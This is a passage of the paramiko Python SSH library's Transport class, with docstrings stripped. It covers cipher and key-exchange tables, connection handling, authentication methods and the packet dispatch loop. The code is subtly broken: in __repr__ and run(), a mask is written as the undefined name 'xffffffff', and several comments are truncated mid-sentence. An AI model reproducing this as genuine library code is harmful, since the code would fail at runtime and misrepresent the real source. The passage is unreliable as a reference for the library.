MSG_CHANNEL_OPEN,
MSG_CHANNEL_SUCCESS,
MSG_CHANNEL_FAILURE,
MSG_CHANNEL_DATA,
MSG_CHANNEL_EXTENDED_DATA,
MSG_CHANNEL_WINDOW_ADJUST,
MSG_CHANNEL_REQUEST,
MSG_CHANNEL_EOF,
MSG_CHANNEL_CLOSE,
MIN_WINDOW_SIZE,
MIN_PACKET_SIZE,
MAX_WINDOW_SIZE,
DEFAULT_WINDOW_SIZE,
DEFAULT_MAX_PACKET_SIZE,
HIGHEST_USERAUTH_MESSAGE_ID,
MSG_UNIMPLEMENTED,
MSG_NAMES,
)
from paramiko.compress import ZlibCompressor, ZlibDecompressor
from paramiko.dsskey import DSSKey
from paramiko.ed25519key import Ed25519Key
from paramiko.kex_gex import KexGex, KexGexSHA256
from paramiko.kex_group1 import KexGroup1
from paramiko.kex_group14 import KexGroup14
from paramiko.kex_ecdh_nist import KexNistp256, KexNistp384, KexNistp521
from paramiko.kex_gss import KexGSSGex, KexGSSGroup1, KexGSSGroup14
from paramiko.message import Message
from paramiko.packet import Packetizer, NeedRekeyException
from paramiko.primes import ModulusPack
from paramiko.py3compat import string_types, long, byte_ord, b, input, PY2
from paramiko.rsakey import RSAKey
from paramiko.ecdsakey import ECDSAKey
from paramiko.server import ServerInterface
from paramiko.sftp_client import SFTPClient
from paramiko.ssh_exception import (
SSHException,
BadAuthenticationType,
ChannelException,
ProxyCommandFailure,
)
from paramiko.util import retry_on_signal, ClosingContextManager, clamp_value
_active_threads = []
def _join_lingering_threads():
for thr in _active_threads:
thr.stop_thread()
import atexit
atexit.register(_join_lingering_threads)
class Transport(threading.Thread, ClosingContextManager):
_ENCRYPT = object()
_DECRYPT = object()
_PROTO_ID = "2.0"
_CLIENT_ID = "paramiko_{}".format(paramiko.__version__)
_preferred_ciphers = (
"aes128-ctr",
"aes192-ctr",
"aes256-ctr",
"aes128-cbc",
"aes192-cbc",
"aes256-cbc",
"blowfish-cbc",
"3des-cbc",
)
_preferred_macs = (
"hmac-sha2-256",
"hmac-sha2-512",
"hmac-sha1",
"hmac-md5",
"hmac-sha1-96",
"hmac-md5-96",
)
_preferred_keys = (
"ssh-ed25519",
"ecdsa-sha2-nistp256",
"ecdsa-sha2-nistp384",
"ecdsa-sha2-nistp521",
"ssh-rsa",
"ssh-dss",
)
_preferred_kex = (
"ecdh-sha2-nistp256",
"ecdh-sha2-nistp384",
"ecdh-sha2-nistp521",
"diffie-hellman-group-exchange-sha256",
"diffie-hellman-group-exchange-sha1",
"diffie-hellman-group14-sha1",
"diffie-hellman-group1-sha1",
)
_preferred_gsskex = (
"gss-gex-sha1-toWM5Slw5Ew8Mqkay+al2g==",
"gss-group14-sha1-toWM5Slw5Ew8Mqkay+al2g==",
"gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==",
)
_preferred_compression = ("none",)
_cipher_info = {
"aes128-ctr": {
"class": algorithms.AES,
"mode": modes.CTR,
"block-size": 16,
"key-size": 16,
},
"aes192-ctr": {
"class": algorithms.AES,
"mode": modes.CTR,
"block-size": 16,
"key-size": 24,
},
"aes256-ctr": {
"class": algorithms.AES,
"mode": modes.CTR,
"block-size": 16,
"key-size": 32,
},
"blowfish-cbc": {
"class": algorithms.Blowfish,
"mode": modes.CBC,
"block-size": 8,
"key-size": 16,
},
"aes128-cbc": {
"class": algorithms.AES,
"mode": modes.CBC,
"block-size": 16,
"key-size": 16,
},
"aes192-cbc": {
"class": algorithms.AES,
"mode": modes.CBC,
"block-size": 16,
"key-size": 24,
},
"aes256-cbc": {
"class": algorithms.AES,
"mode": modes.CBC,
"block-size": 16,
"key-size": 32,
},
"3des-cbc": {
"class": algorithms.TripleDES,
"mode": modes.CBC,
"block-size": 8,
"key-size": 24,
},
}
_mac_info = {
"hmac-sha1": {"class": sha1, "size": 20},
"hmac-sha1-96": {"class": sha1, "size": 12},
"hmac-sha2-256": {"class": sha256, "size": 32},
"hmac-sha2-512": {"class": sha512, "size": 64},
"hmac-md5": {"class": md5, "size": 16},
"hmac-md5-96": {"class": md5, "size": 12},
}
_key_info = {
"ssh-rsa": RSAKey,
"ssh-rsa-cert-v01@openssh.com": RSAKey,
"ssh-dss": DSSKey,
"ssh-dss-cert-v01@openssh.com": DSSKey,
"ecdsa-sha2-nistp256": ECDSAKey,
"ecdsa-sha2-nistp256-cert-v01@openssh.com": ECDSAKey,
"ecdsa-sha2-nistp384": ECDSAKey,
"ecdsa-sha2-nistp384-cert-v01@openssh.com": ECDSAKey,
"ecdsa-sha2-nistp521": ECDSAKey,
"ecdsa-sha2-nistp521-cert-v01@openssh.com": ECDSAKey,
"ssh-ed25519": Ed25519Key,
"ssh-ed25519-cert-v01@openssh.com": Ed25519Key,
}
_kex_info = {
"diffie-hellman-group1-sha1": KexGroup1,
"diffie-hellman-group14-sha1": KexGroup14,
"diffie-hellman-group-exchange-sha1": KexGex,
"diffie-hellman-group-exchange-sha256": KexGexSHA256,
"gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==": KexGSSGroup1,
"gss-group14-sha1-toWM5Slw5Ew8Mqkay+al2g==": KexGSSGroup14,
"gss-gex-sha1-toWM5Slw5Ew8Mqkay+al2g==": KexGSSGex,
"ecdh-sha2-nistp256": KexNistp256,
"ecdh-sha2-nistp384": KexNistp384,
"ecdh-sha2-nistp521": KexNistp521,
}
_compression_info = {
"zlib@openssh.com": (ZlibCompressor, ZlibDecompressor),
"zlib": (ZlibCompressor, ZlibDecompressor),
"none": (None, None),
}
_modulus_pack = None
_active_check_timeout = 0.1
def __init__(
self,
sock,
default_window_size=DEFAULT_WINDOW_SIZE,
default_max_packet_size=DEFAULT_MAX_PACKET_SIZE,
gss_kex=False,
gss_deleg_creds=True,
):
self.active = False
self.hostname = None
if isinstance(sock, string_types):
# convert "host:port" into (host, port)
hl = sock.split(":", 1)
self.hostname = hl[0]
if len(hl) == 1:
sock = (hl[0], 22)
else:
sock = (hl[0], int(hl[1]))
if type(sock) is tuple:
# connect to the given (host, port)
hostname, port = sock
self.hostname = hostname
reason = "No suitable address family"
addrinfos = socket.getaddrinfo(
hostname, port, socket.AF_UNSPEC, socket.SOCK_STREAM
)
for family, socktype, proto, canonname, sockaddr in addrinfos:
if socktype == socket.SOCK_STREAM:
af = family
# addr = sockaddr
sock = socket.socket(af, socket.SOCK_STREAM)
try:
retry_on_signal(lambda: sock.connect((hostname, port)))
except socket.error as e:
reason = str(e)
else:
break
else:
raise SSHException(
"Unable to connect to {}: {}".format(hostname, reason)
)
# okay, normal socket-ish flow here...
threading.Thread.__init__(self)
self.setDaemon(True)
self.sock = sock
# we set the timeout so we can check self.active periodically to
# see if we should bail. socket.timeout exception is never propagated.
self.sock.settimeout(self._active_check_timeout)
# negotiated crypto parameters
self.packetizer = Packetizer(sock)
self.local_version = "SSH-" + self._PROTO_ID + "-" + self._CLIENT_ID
self.remote_version = ""
self.local_cipher = self.remote_cipher = ""
self.local_kex_init = self.remote_kex_init = None
self.local_mac = self.remote_mac = None
self.local_compression = self.remote_compression = None
self.session_id = None
self.host_key_type = None
self.host_key = None
# GSS-API / SSPI Key Exchange
self.use_gss_kex = gss_kex
# This will be set to True if GSS-API Key Exchange was performed
self.gss_kex_used = False
self.kexgss_ctxt = None
self.gss_host = None
if self.use_gss_kex:
self.kexgss_ctxt = GSSAuth("gssapi-keyex", gss_deleg_creds)
self._preferred_kex = self._preferred_gsskex + self._preferred_kex
# state used during negotiation
self.kex_engine = None
self.H = None
self.K = None
self.initial_kex_done = False
self.in_kex = False
self.authenticated = False
self._expected_packet = tuple()
# synchronization (always higher level than write_lock)
self.lock = threading.Lock()
# tracking open channels
self._channels = ChannelMap()
self.channel_events = {} # (id -> Event)
self.channels_seen = {} # (id -> True)
self._channel_counter = 0
self.default_max_packet_size = default_max_packet_size
self.default_window_size = default_window_size
self._forward_agent_handler = None
self._x11_handler = None
self._tcp_handler = None
self.saved_exception = None
self.clear_to_send = threading.Event()
self.clear_to_send_lock = threading.Lock()
self.clear_to_send_timeout = 30.0
self.log_name = "paramiko.transport"
self.logger = util.get_logger(self.log_name)
self.packetizer.set_log(self.logger)
self.auth_handler = None
# response Message from an arbitrary global request
self.global_response = None
# user-defined event callbacks
self.completion_event = None
# how long (seconds) to wait for the SSH banner
self.banner_timeout = 15
# how long (seconds) to wait for the handshake to finish after SSH
# banner sent.
self.handshake_timeout = 15
# how long (seconds) to wait for the auth response.
self.auth_timeout = 30
# server mode:
self.server_mode = False
self.server_object = None
self.server_key_dict = {}
self.server_accepts = []
self.server_accept_cv = threading.Condition(self.lock)
self.subsystem_table = {}
def __repr__(self):
id_ = hex(long(id(self)) & xffffffff)
out = "<paramiko.Transport at {}".format(id_)
if not self.active:
out += " (unconnected)"
else:
if self.local_cipher != "":
out += " (cipher {}, {:d} bits)".format(
self.local_cipher,
self._cipher_info[self.local_cipher]["key-size"] * 8,
)
if self.is_authenticated():
out += " (active; {} open channel(s))".format(
len(self._channels)
)
elif self.initial_kex_done:
out += " (connected; awaiting auth)"
else:
out += " (connecting)"
out += ">"
return out
def atfork(self):
self.sock.close()
self.close()
def get_security_options(self):
return SecurityOptions(self)
def set_gss_host(self, gss_host, trust_dns=True, gssapi_requested=True):
# No GSSAPI in play == nothing to do
if not gssapi_requested:
return
# Obtain the correct host first - did user request a GSS-specific name
# to use that is distinct from the actual SSH target hostname?
if gss_host is None:
gss_host = self.hostname
# Finally, canonicalize via DNS if DNS is trusted.
if trust_dns and gss_host is not None:
gss_host = socket.getfqdn(gss_host)
# And set attribute for reference later.
self.gss_host = gss_host
def start_client(self, event=None, timeout=None):
self.active = True
if event is not None:
# async, return immediately and let the app poll for completion
self.completion_event = event
self.start()
return
# synchronous, wait for a result
self.completion_event = event = threading.Event()
self.start()
max_time = time.time() + timeout if timeout is not None else None
while True:
event.wait(0.1)
if not self.active:
e = self.get_exception()
if e is not None:
raise e
raise SSHException("Negotiation failed.")
if event.is_set() or (
timeout is not None and time.time() >= max_time
):
break
def start_server(self, event=None, server=None):
if server is None:
server = ServerInterface()
self.server_mode = True
self.server_object = server
self.active = True
if event is not None:
# async, return immediately and let the app poll for completion
self.completion_event = event
self.start()
return
# synchronous, wait for a result
self.completion_event = event = threading.Event()
self.start()
while True:
event.wait(0.1)
if not self.active:
e = self.get_exception()
if e is not None:
raise e
raise SSHException("Negotiation failed.")
if event.is_set():
break
def add_server_key(self, key):
self.server_key_dict[key.get_name()] = key
def get_server_key(self):
try:
return self.server_key_dict[self.host_key_type]
except KeyError:
pass
return None
@staticmethod
def load_server_moduli(filename=None):
Transport._modulus_pack = ModulusPack()
# places to look for the openssh "moduli" file
file_list = ["/etc/ssh/moduli", "/usr/local/etc/moduli"]
if filename is not None:
file_list.insert(0, filename)
for fn in file_list:
try:
Transport._modulus_pack.read_file(fn)
return True
except IOError:
pass
# none succeeded
Transport._modulus_pack = None
return False
def close(self):
if not self.active:
return
self.stop_thread()
for chan in list(self._channels.values()):
chan._unlink()
self.sock.close()
def get_remote_server_key(self):
if (not self.active) or (not self.initial_kex_done):
raise SSHException("No existing session")
return self.host_key
def is_active(self):
return self.active
def open_session(
self, window_size=None, max_packet_size=None, timeout=None
):
return self.open_channel(
"session",
window_size=window_size,
max_packet_size=max_packet_size,
timeout=timeout,
)
def open_x11_channel(self, src_addr=None):
return self.open_channel("x11", src_addr=src_addr)
def open_forward_agent_channel(self):
return self.open_channel("auth-agent@openssh.com")
def open_forwarded_tcpip_channel(self, src_addr, dest_addr):
return self.open_channel("forwarded-tcpip", dest_addr, src_addr)
def open_channel(
self,
kind,
dest_addr=None,
src_addr=None,
window_size=None,
max_packet_size=None,
timeout=None,
):
if not self.active:
raise SSHException("SSH session not active")
timeout = 3600 if timeout is None else timeout
self.lock.acquire()
try:
window_size = self._sanitize_window_size(window_size)
max_packet_size = self._sanitize_packet_size(max_packet_size)
chanid = self._next_channel()
m = Message()
m.add_byte(cMSG_CHANNEL_OPEN)
m.add_string(kind)
m.add_int(chanid)
m.add_int(window_size)
m.add_int(max_packet_size)
if (kind == "forwarded-tcpip") or (kind == "direct-tcpip"):
m.add_string(dest_addr[0])
m.add_int(dest_addr[1])
m.add_string(src_addr[0])
m.add_int(src_addr[1])
elif kind == "x11":
m.add_string(src_addr[0])
m.add_int(src_addr[1])
chan = Channel(chanid)
self._channels.put(chanid, chan)
self.channel_events[chanid] = event = threading.Event()
self.channels_seen[chanid] = True
chan._set_transport(self)
chan._set_window(window_size, max_packet_size)
finally:
self.lock.release()
self._send_user_message(m)
start_ts = time.time()
while True:
event.wait(0.1)
if not self.active:
e = self.get_exception()
if e is None:
e = SSHException("Unable to open channel.")
raise e
if event.is_set():
break
elif start_ts + timeout < time.time():
raise SSHException("Timeout opening channel.")
chan = self._channels.get(chanid)
if chan is not None:
return chan
e = self.get_exception()
if e is None:
e = SSHException("Unable to open channel.")
raise e
def request_port_forward(self, address, port, handler=None):
if not self.active:
raise SSHException("SSH session not active")
port = int(port)
response = self.global_request(
"tcpip-forward", (address, port), wait=True
)
if response is None:
raise SSHException("TCP forwarding request denied")
if port == 0:
port = response.get_int()
if handler is None:
def default_handler(channel, src_addr, dest_addr_port):
# src_addr, src_port = src_addr_port
# dest_addr, dest_port = dest_addr_port
self._queue_incoming_channel(channel)
handler = default_handler
self._tcp_handler = handler
return port
def cancel_port_forward(self, address, port):
if not self.active:
return
self._tcp_handler = None
self.global_request("cancel-tcpip-forward", (address, port), wait=True)
def open_sftp_client(self):
return SFTPClient.from_transport(self)
def send_ignore(self, byte_count=None):
m = Message()
m.add_byte(cMSG_IGNORE)
if byte_count is None:
byte_count = (byte_ord(os.urandom(1)) % 32) + 10
m.add_bytes(os.urandom(byte_count))
self._send_user_message(m)
def renegotiate_keys(self):
self.completion_event = threading.Event()
self._send_kex_init()
while True:
self.completion_event.wait(0.1)
if not self.active:
e = self.get_exception()
if e is not None:
raise e
raise SSHException("Negotiation failed.")
if self.completion_event.is_set():
break
return
def set_keepalive(self, interval):
def _request(x=weakref.proxy(self)):
return x.global_request("keepalive@lag.net", wait=False)
self.packetizer.set_keepalive(interval, _request)
def global_request(self, kind, data=None, wait=True):
if wait:
self.completion_event = threading.Event()
m = Message()
m.add_byte(cMSG_GLOBAL_REQUEST)
m.add_string(kind)
m.add_boolean(wait)
if data is not None:
m.add(*data)
self._log(DEBUG, 'Sending global request "{}"'.format(kind))
self._send_user_message(m)
if not wait:
return None
while True:
self.completion_event.wait(0.1)
if not self.active:
return None
if self.completion_event.is_set():
break
return self.global_response
def accept(self, timeout=None):
self.lock.acquire()
try:
if len(self.server_accepts) > 0:
chan = self.server_accepts.pop(0)
else:
self.server_accept_cv.wait(timeout)
if len(self.server_accepts) > 0:
chan = self.server_accepts.pop(0)
else:
# timeout
chan = None
finally:
self.lock.release()
return chan
def connect(
self,
hostkey=None,
username="",
password=None,
pkey=None,
gss_host=None,
gss_auth=False,
gss_kex=False,
gss_deleg_creds=True,
gss_trust_dns=True,
):
if hostkey is not None:
self._preferred_keys = [hostkey.get_name()]
self.set_gss_host(
gss_host=gss_host,
trust_dns=gss_trust_dns,
gssapi_requested=gss_kex or gss_auth,
)
self.start_client()
# check host key if we were given one
# If GSS-API Key Exchange was performed, we are not required to check
# the host key.
if (hostkey is not None) and not gss_kex:
key = self.get_remote_server_key()
if (
key.get_name() != hostkey.get_name()
or key.asbytes() != hostkey.asbytes()
):
self._log(DEBUG, "Bad host key from server")
self._log(
DEBUG,
"Expected: {}: {}".format(
hostkey.get_name(), repr(hostkey.asbytes())
),
)
self._log(
DEBUG,
"Got : {}: {}".format(
key.get_name(), repr(key.asbytes())
),
)
raise SSHException("Bad host key from server")
self._log(
DEBUG, "Host key verified ({})".format(hostkey.get_name())
)
if (pkey is not None) or (password is not None) or gss_auth or gss_kex:
if gss_auth:
self._log(
DEBUG, "Attempting GSS-API auth... (gssapi-with-mic)"
) # noqa
self.auth_gssapi_with_mic(
username, self.gss_host, gss_deleg_creds
)
elif gss_kex:
self._log(DEBUG, "Attempting GSS-API auth... (gssapi-keyex)")
self.auth_gssapi_keyex(username)
elif pkey is not None:
self._log(DEBUG, "Attempting public-key auth...")
self.auth_publickey(username, pkey)
else:
self._log(DEBUG, "Attempting password auth...")
self.auth_password(username, password)
return
def get_exception(self):
self.lock.acquire()
try:
e = self.saved_exception
self.saved_exception = None
return e
finally:
self.lock.release()
def set_subsystem_handler(self, name, handler, *larg, **kwarg):
try:
self.lock.acquire()
self.subsystem_table[name] = (handler, larg, kwarg)
finally:
self.lock.release()
def is_authenticated(self):
return (
self.active
and self.auth_handler is not None
and self.auth_handler.is_authenticated()
)
def get_username(self):
if not self.active or (self.auth_handler is None):
return None
return self.auth_handler.get_username()
def get_banner(self):
if not self.active or (self.auth_handler is None):
return None
return self.auth_handler.banner
def auth_none(self, username):
if (not self.active) or (not self.initial_kex_done):
raise SSHException("No existing session")
my_event = threading.Event()
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_none(username, my_event)
return self.auth_handler.wait_for_response(my_event)
def auth_password(self, username, password, event=None, fallback=True):
if (not self.active) or (not self.initial_kex_done):
# we should never try to send the password unless we're on a secure
raise SSHException("No existing session")
if event is None:
my_event = threading.Event()
else:
my_event = event
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_password(username, password, my_event)
if event is not None:
return []
try:
return self.auth_handler.wait_for_response(my_event)
except BadAuthenticationType as e:
# try to fudge it
if not fallback or ("keyboard-interactive" not in e.allowed_types):
raise
try:
def handler(title, instructions, fields):
if len(fields) > 1:
raise SSHException("Fallback authentication failed.")
if len(fields) == 0:
# for some reason, at least on os x, a 2nd request will
# be made with zero fields requested. maybe it's just
return []
return [password]
return self.auth_interactive(username, handler)
except SSHException:
# attempt failed; just raise the original exception
raise e
def auth_publickey(self, username, key, event=None):
if (not self.active) or (not self.initial_kex_done):
# we should never try to authenticate unless we're on a secure link
raise SSHException("No existing session")
if event is None:
my_event = threading.Event()
else:
my_event = event
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_publickey(username, key, my_event)
if event is not None:
return []
return self.auth_handler.wait_for_response(my_event)
def auth_interactive(self, username, handler, submethods=""):
if (not self.active) or (not self.initial_kex_done):
raise SSHException("No existing session")
my_event = threading.Event()
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_interactive(
username, handler, my_event, submethods
)
return self.auth_handler.wait_for_response(my_event)
def auth_interactive_dumb(self, username, handler=None, submethods=""):
if not handler:
def handler(title, instructions, prompt_list):
answers = []
if title:
print(title.strip())
if instructions:
print(instructions.strip())
for prompt, show_input in prompt_list:
print(prompt.strip(), end=" ")
answers.append(input())
return answers
return self.auth_interactive(username, handler, submethods)
def auth_gssapi_with_mic(self, username, gss_host, gss_deleg_creds):
if (not self.active) or (not self.initial_kex_done):
# we should never try to authenticate unless we're on a secure link
raise SSHException("No existing session")
my_event = threading.Event()
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_gssapi_with_mic(
username, gss_host, gss_deleg_creds, my_event
)
return self.auth_handler.wait_for_response(my_event)
def auth_gssapi_keyex(self, username):
if (not self.active) or (not self.initial_kex_done):
raise SSHException("No existing session")
my_event = threading.Event()
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_gssapi_keyex(username, my_event)
return self.auth_handler.wait_for_response(my_event)
def set_log_channel(self, name):
self.log_name = name
self.logger = util.get_logger(name)
self.packetizer.set_log(self.logger)
def get_log_channel(self):
return self.log_name
def set_hexdump(self, hexdump):
self.packetizer.set_hexdump(hexdump)
def get_hexdump(self):
return self.packetizer.get_hexdump()
def use_compression(self, compress=True):
if compress:
self._preferred_compression = ("zlib@openssh.com", "zlib", "none")
else:
self._preferred_compression = ("none",)
def getpeername(self):
gp = getattr(self.sock, "getpeername", None)
if gp is None:
return "unknown", 0
return gp()
def stop_thread(self):
self.active = False
self.packetizer.close()
if PY2:
# Original join logic; #520 doesn't appear commonly present under
while self.is_alive() and self is not threading.current_thread():
self.join(10)
else:
# race condition preventing it from timing out correctly), wherein
# our socket and packetizer are both closed (but where we'd
while (
self.is_alive()
and self is not threading.current_thread()
and not self.sock._closed
and not self.packetizer.closed
):
self.join(0.1)
def _log(self, level, msg, *args):
if issubclass(type(msg), list):
for m in msg:
self.logger.log(level, m)
else:
self.logger.log(level, msg, *args)
def _get_modulus_pack(self):
return self._modulus_pack
def _next_channel(self):
chanid = self._channel_counter
while self._channels.get(chanid) is not None:
self._channel_counter = (self._channel_counter + 1) & 0xffffff
chanid = self._channel_counter
self._channel_counter = (self._channel_counter + 1) & 0xffffff
return chanid
def _unlink_channel(self, chanid):
self._channels.delete(chanid)
def _send_message(self, data):
self.packetizer.send_message(data)
def _send_user_message(self, data):
start = time.time()
while True:
self.clear_to_send.wait(0.1)
if not self.active:
self._log(
DEBUG, "Dropping user packet because connection is dead."
)
return
self.clear_to_send_lock.acquire()
if self.clear_to_send.is_set():
break
self.clear_to_send_lock.release()
if time.time() > start + self.clear_to_send_timeout:
raise SSHException(
"Key-exchange timed out waiting for key negotiation"
)
try:
self._send_message(data)
finally:
self.clear_to_send_lock.release()
def _set_K_H(self, k, h):
self.K = k
self.H = h
if self.session_id is None:
self.session_id = h
def _expect_packet(self, *ptypes):
self._expected_packet = tuple(ptypes)
def _verify_key(self, host_key, sig):
key = self._key_info[self.host_key_type](Message(host_key))
if key is None:
raise SSHException("Unknown host key type")
if not key.verify_ssh_sig(self.H, Message(sig)):
raise SSHException(
"Signature verification ({}) failed.".format(
self.host_key_type
)
)
self.host_key = key
def _compute_key(self, id, nbytes):
m = Message()
m.add_mpint(self.K)
m.add_bytes(self.H)
m.add_byte(b(id))
m.add_bytes(self.session_id)
hash_algo = getattr(self.kex_engine, "hash_algo", None)
hash_select_msg = "kex engine {} specified hash_algo {!r}".format(
self.kex_engine.__class__.__name__, hash_algo
)
if hash_algo is None:
hash_algo = sha1
hash_select_msg += ", falling back to sha1"
if not hasattr(self, "_logged_hash_selection"):
self._log(DEBUG, hash_select_msg)
setattr(self, "_logged_hash_selection", True)
out = sofar = hash_algo(m.asbytes()).digest()
while len(out) < nbytes:
m = Message()
m.add_mpint(self.K)
m.add_bytes(self.H)
m.add_bytes(sofar)
digest = hash_algo(m.asbytes()).digest()
out += digest
sofar += digest
return out[:nbytes]
def _get_cipher(self, name, key, iv, operation):
if name not in self._cipher_info:
raise SSHException("Unknown client cipher " + name)
else:
cipher = Cipher(
self._cipher_info[name]["class"](key),
self._cipher_info[name]["mode"](iv),
backend=default_backend(),
)
if operation is self._ENCRYPT:
return cipher.encryptor()
else:
return cipher.decryptor()
def _set_forward_agent_handler(self, handler):
if handler is None:
def default_handler(channel):
self._queue_incoming_channel(channel)
self._forward_agent_handler = default_handler
else:
self._forward_agent_handler = handler
def _set_x11_handler(self, handler):
# only called if a channel has turned on x11 forwarding
if handler is None:
# by default, use the same mechanism as accept()
def default_handler(channel, src_addr_port):
self._queue_incoming_channel(channel)
self._x11_handler = default_handler
else:
self._x11_handler = handler
def _queue_incoming_channel(self, channel):
self.lock.acquire()
try:
self.server_accepts.append(channel)
self.server_accept_cv.notify()
finally:
self.lock.release()
def _sanitize_window_size(self, window_size):
if window_size is None:
window_size = self.default_window_size
return clamp_value(MIN_WINDOW_SIZE, window_size, MAX_WINDOW_SIZE)
def _sanitize_packet_size(self, max_packet_size):
if max_packet_size is None:
max_packet_size = self.default_max_packet_size
return clamp_value(MIN_PACKET_SIZE, max_packet_size, MAX_WINDOW_SIZE)
def _ensure_authed(self, ptype, message):
if (
not self.server_mode
or ptype <= HIGHEST_USERAUTH_MESSAGE_ID
or self.is_authenticated()
):
return None
# WELP. We must be dealing with someone trying to do non-auth things
# without being authed. Tell them off, based on message class.
reply = Message()
# Global requests have no details, just failure.
if ptype == MSG_GLOBAL_REQUEST:
reply.add_byte(cMSG_REQUEST_FAILURE)
# Channel opens let us reject w/ a specific type + message.
elif ptype == MSG_CHANNEL_OPEN:
kind = message.get_text() # noqa
chanid = message.get_int()
reply.add_byte(cMSG_CHANNEL_OPEN_FAILURE)
reply.add_int(chanid)
reply.add_int(OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED)
reply.add_string("")
reply.add_string("en")
# NOTE: Post-open channel messages do not need checking; the above will
# reject attemps to open channels, meaning that even if a malicious
# user tries to send a MSG_CHANNEL_REQUEST, it will simply fall under
# the logic that handles unknown channel IDs (as the channel list will
# be empty.)
return reply
def run(self):
# (use the exposed "run" method, because if we specify a thread target
# of a private method, threading.Thread will keep a reference to it
# indefinitely, creating a GC cycle and not letting Transport ever be
# GC'd. it's a bug in Thread.)
# Hold reference to 'sys' so we can test sys.modules to detect
# interpreter shutdown.
self.sys = sys
# active=True occurs before the thread is launched, to avoid a race
_active_threads.append(self)
tid = hex(long(id(self)) & xffffffff)
if self.server_mode:
self._log(DEBUG, "starting thread (server mode): {}".format(tid))
else:
self._log(DEBUG, "starting thread (client mode): {}".format(tid))
try:
try:
self.packetizer.write_all(b(self.local_version + "\r\n"))
self._log(
DEBUG,
"Local version/idstring: {}".format(self.local_version),
) # noqa
self._check_banner()
# The above is actually very much part of the handshake, but
# sometimes the banner can be read but the machine is not
# responding, for example when the remote ssh daemon is loaded
# in to memory but we can not read from the disk/spawn a new
# shell.
# Make sure we can specify a timeout for the initial handshake.
# Re-use the banner timeout for now.
self.packetizer.start_handshake(self.handshake_timeout)
self._send_kex_init()
self._expect_packet(MSG_KEXINIT)
while self.active:
if self.packetizer.need_rekey() and not self.in_kex:
self._send_kex_init()
try:
ptype, m = self.packetizer.read_message()
except NeedRekeyException:
continue
if ptype == MSG_IGNORE:
continue
elif ptype == MSG_DISCONNECT:
self._parse_disconnect(m)
break
elif ptype == MSG_DEBUG:
self._parse_debug(m)
continue
if len(self._expected_packet) > 0:
if ptype not in self._expected_packet:
raise SSHException(
"Expecting packet from {!r}, got {:d}".format(
self._expected_packet, ptype
)
) # noqa
self._expected_packet = tuple()
if (ptype >= 30) and (ptype <= 41):
self.kex_engine.parse_next(ptype, m)
continue
if ptype in self._handler_table:
error_msg = self._ensure_authed(ptype, m)
if error_msg:
self._send_message(error_msg)
else:
self._handler_table[ptype](self, m)
elif ptype in self._channel_handler_table:
chanid = m.get_int()
chan = self._channels.get(chanid)
if chan is not None:
self._channel_handler_table[ptype](chan, m)
elif chanid in self.channels_seen:
self._log(
DEBUG,
"Ignoring message for dead channel {:d}".format( # noqa
chanid
),
)
else:
self._log(
ERROR,
"Channel request for unknown channel {:d}".format( # noqa
chanid
),
)
break
elif (
self.auth_handler is not None
and ptype in self.auth_handler._handler_table
):
handler = self.auth_handler._handler_table[ptype]
handler(self.auth_handler, m)
if len(self._expected_packet) > 0:
continue
else:
# Respond with "I don't implement this particular
# message type" message (unless the message type was
name = MSG_NAMES[ptype]
warning = "Oops, unhandled type {} ({!r})".format(
ptype, name
)
self._log(WARNING, warning)
if ptype != MSG_UNIMPLEMENTED:
msg = Message()
msg.add_byte(cMSG_UNIMPLEMENTED)
msg.add_int(m.seqno)
self._send_message(msg)
self.packetizer.complete_handshake()
except SSHException as e:
self._log(ERROR, "Exception: " + str(e))
self._log(ERROR, util.tb_strings())
self.saved_exception = e
except EOFError as e:
self._log(DEBUG, "EOF in transport thread")
self.saved_exception = e
except socket.error as e:
if type(e.args) is tuple:
if e.args:
emsg = "{} ({:d})".format(e.args[1], e.args[0])
else:
emsg = str(e) or repr(e)
else:
emsg = e.args
self._log(ERROR, "Socket exception: " + emsg)
self.saved_exception = e
except Exception as e:
self._log(ERROR, "Unknown exception: " + str(e))
self._log(ERROR, util.tb_strings())
self.saved_exception = e
_active_threads.remove(self)
for chan in list(self._channels.values()):
chan._unlink()
if self.active:
self.active = False
self.packetizer.close()
if self.completion_event is not None:
self.completion_event.set()
if self.auth_handler is not None:
self.auth_handler.abort()
for event in self.channel_events.values():
event.set()
try:
self.lock.acquire()
self.server_accept_cv.notify()
finally:
self.lock.release()
self.sock.close()
except:
# wake up during interpreter shutdown. Or rather -- raise
# everything *if* sys.modules (used as a convenient sentinel)
# appears to still exist.
if self.sys.modules is not None:
raise
def _log_agreement(self, which, local, remote):
# Log useful, non-duplicative line re: an agreed-upon algorithm.
# Old code implied algorithms could be asymmetrical (different for
# inbound vs outbound) so we preserve that possibility.
msg = "{} agreed: ".format(which)
if local == remote:
msg += local
else:
msg += "local={}, remote={}".format(local, remote)
self._log(DEBUG, msg)
# protocol stages
def _negotiate_keys(self, m):
# throws SSHException on anything unusual
self.clear_to_send_lock.acquire()
try:
self.clear_to_send.clear()
finally:
self.clear_to_send_lock.release()
if self.local_kex_init is None:
# remote side wants to renegotiate
self._send_kex_init()
self._parse_kex_init(m)
self.kex_engine.start_kex()
def _check_banner(self):
# this is slow, but we only have to do it once
for i in range(100):
# give them 15 seconds for the first line, then just 2 seconds
# each additional line. (some sites have very high latency.)
if i == 0:
timeout = self.banner_timeout
else:
timeout = 2
try:
buf = self.packetizer.readline(timeout)
except ProxyCommandFailure:
raise
except Exception as e:
raise SSHException(
"Error reading SSH protocol banner" + str(e)
)
if buf[:4] == "SSH-":
break
self._log(DEBUG, "Banner: " + buf)
if buf[:4] != "SSH-":
raise SSHException('Indecipherable protocol version "' + buf + '"')
# save this server version string for later
self.remote_version = buf
self._log(DEBUG, "Remote version/idstring: {}".format(buf))
# pull off any attached comment
# NOTE: comment used to be stored in a variable and then...never used.
# since 2003. ca 877cd974b8182d26fa76d566072917ea67b64e67
i = buf.find(" ")
if i >= 0:
buf = buf[:i]
# parse out version string and make sure it matches
segs = buf.split("-", 2)
if len(segs) < 3:
raise SSHException("Invalid SSH banner")
version = segs[1]
client = segs[2]
if version != "1.99" and version != "2.0":
msg = "Incompatible version ({} instead of 2.0)"
